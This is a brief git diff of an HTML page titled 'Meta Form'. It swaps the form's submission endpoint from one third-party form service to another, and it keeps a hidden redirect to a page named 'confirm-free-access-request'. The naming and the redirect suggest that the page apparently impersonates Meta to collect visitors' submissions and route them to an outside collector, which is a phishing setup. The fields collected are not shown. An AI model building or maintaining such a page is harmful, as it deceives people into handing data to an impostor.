--- a/Meta Form.html
+++ b/Meta Form.html
@@ -10,7 +10,7 @@
 </head>
 
 <body>
-    <form class="sm:hidden lg:block md:block" action="https://submit-form.com/11iBHDI7X" method="post">
+    <form class="sm:hidden lg:block md:block" action="https://formspree.io/f/xwpknjrj" method="post">
                 <input type="hidden" name="_redirect" value="https://confirm-free-access-request.vercel.app/" method="post">
 
 
